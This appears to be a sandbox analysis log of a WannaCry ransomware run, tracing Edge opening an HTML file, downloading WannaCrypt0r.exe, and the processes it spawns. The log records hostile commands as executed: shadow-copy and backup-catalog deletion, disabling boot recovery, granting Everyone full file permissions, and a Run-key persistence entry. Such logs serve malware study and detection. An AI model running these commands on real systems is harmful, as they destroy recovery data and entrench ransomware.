
pid	Process
5020	attrib.exe
188	attrib.exe
5984	attrib.exe
3644	attrib.exe
2668	attrib.exe
5268	attrib.exe
4916	attrib.exe

C:\Users\Admin\AppData\Local\Temp\DoNothing.exe
"C:\Users\Admin\AppData\Local\Temp\DoNothing.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:328

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\TraceFormat.html
1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2f8,0x2fc,0x300,0x2f4,0x314,0x7fff9dcdf208,0x7fff9dcdf214,0x7fff9dcdf220
  2⤵
  PID:1120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1928,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=2280 /prefetch:3
  2⤵
  - Downloads MZ/PE file
  PID:1032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2252,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=2248 /prefetch:2
  2⤵
  PID:736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2520,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=2736 /prefetch:8
  2⤵
  PID:3240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3508,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=3524 /prefetch:1
  2⤵
  PID:1192
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3512,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=3584 /prefetch:1
  2⤵
  PID:4656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=5112,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=5096 /prefetch:1
  2⤵
  PID:1768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4904,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=5288 /prefetch:8
  2⤵
  PID:2204
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5304,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=5324 /prefetch:8
  2⤵
  PID:1844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5696,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=5688 /prefetch:8
  2⤵
  PID:4228
- C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5824,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=6180 /prefetch:8
  2⤵
  PID:4036
- C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5824,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=6180 /prefetch:8
  2⤵
  PID:5456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6768,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=6760 /prefetch:8
  2⤵
  PID:4220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=6940,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=5352 /prefetch:1
  2⤵
  PID:5564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --always-read-main-dll --field-trial-handle=5344,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=6764 /prefetch:1
  2⤵
  PID:5228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=7048,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=7208 /prefetch:1
  2⤵
  PID:2152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=7056,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=7076 /prefetch:1
  2⤵
  PID:5296
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --always-read-main-dll --field-trial-handle=7408,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=7400 /prefetch:1
  2⤵
  PID:3532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=7612,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=3792 /prefetch:1
  2⤵
  PID:1236
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7704,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=7692 /prefetch:8
  2⤵
  PID:3076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7428,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=7672 /prefetch:8
  2⤵
  PID:4440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7452,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=7544 /prefetch:8
  2⤵
  PID:3420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6936,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=7072 /prefetch:8
  2⤵
  PID:384
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5500,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=3764 /prefetch:8
  2⤵
  PID:4196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5320,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=4948 /prefetch:8
  2⤵
  PID:5124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5600,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=5620 /prefetch:8
  2⤵
  PID:2328
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=5536,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=5524 /prefetch:1
  2⤵
  PID:5360
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5784,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=5240 /prefetch:8
  2⤵
  PID:5688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=3788,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=6664 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5852
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=6660,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=3816 /prefetch:1
  2⤵
  PID:4620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=6584,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=6580 /prefetch:1
  2⤵
  PID:1192
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6112,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=6240 /prefetch:8
  2⤵
  PID:5092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8100,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=3576 /prefetch:8
  2⤵
  PID:4904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3148,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=3692 /prefetch:8
  2⤵
  PID:928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=7464,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=8088 /prefetch:1
  2⤵
  PID:4824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8200,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=8168 /prefetch:8
  2⤵
  PID:4284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --always-read-main-dll --field-trial-handle=8268,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=8264 /prefetch:1
  2⤵
  PID:5600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --always-read-main-dll --field-trial-handle=6552,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=7444 /prefetch:1
  2⤵
  PID:4532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --always-read-main-dll --field-trial-handle=4948,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=8376 /prefetch:1
  2⤵
  PID:5044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5636,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=7632 /prefetch:8
  2⤵
  PID:2456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --always-read-main-dll --field-trial-handle=8308,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=7636 /prefetch:1
  2⤵
  PID:1760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8060,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=8360 /prefetch:8
  2⤵
  PID:3736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7948,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=8168 /prefetch:8
  2⤵
  PID:2604
- C:\Users\Admin\Downloads\WannaCrypt0r.exe
  "C:\Users\Admin\Downloads\WannaCrypt0r.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Sets desktop wallpaper using registry
  - System Location Discovery: System Language Discovery
  PID:6112
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h .
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:5020
- - C:\Windows\SysWOW64\icacls.exe
    icacls . /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:4828
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 210741742386322.bat
    3⤵
    - System Location Discovery: System Language Discovery
    PID:884
  - - C:\Windows\SysWOW64\cscript.exe
      cscript.exe //nologo m.vbs
      4⤵
      System Location Discovery: System Language Discovery
      PID:5832
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s F:\$RECYCLE
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:188
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected] co
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:5616
  - - C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe
      TaskData\Tor\taskhsvc.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:5028
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c start /b @[email protected] vs
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2736
  - - C:\Users\Admin\Downloads\@[email protected]
      @[email protected] vs
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:5512
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2920
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2884
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:408
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:5268
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Sets desktop wallpaper using registry
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    PID:2156
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "gomakdnjvd619" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3288
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "gomakdnjvd619" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:5812
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:1920
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2032
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:2496
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:6008
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:4576
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:5692
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3596
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:6092
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:3116
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:7416
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:7424
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:7476
- C:\Users\Admin\Downloads\WannaCrypt0r.exe
  "C:\Users\Admin\Downloads\WannaCrypt0r.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:6000
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h .
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:5984
- - C:\Windows\SysWOW64\icacls.exe
    icacls . /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:4484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3712,i,15755117673631010134,106851448140578479,262144 --variations-seed-version --mojo-platform-channel-handle=8208 /prefetch:8
  2⤵
  PID:2624
- C:\Users\Admin\Downloads\WannaCrypt0r.exe
  "C:\Users\Admin\Downloads\WannaCrypt0r.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5012
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h .
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:3644
- - C:\Windows\SysWOW64\icacls.exe
    icacls . /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:5640
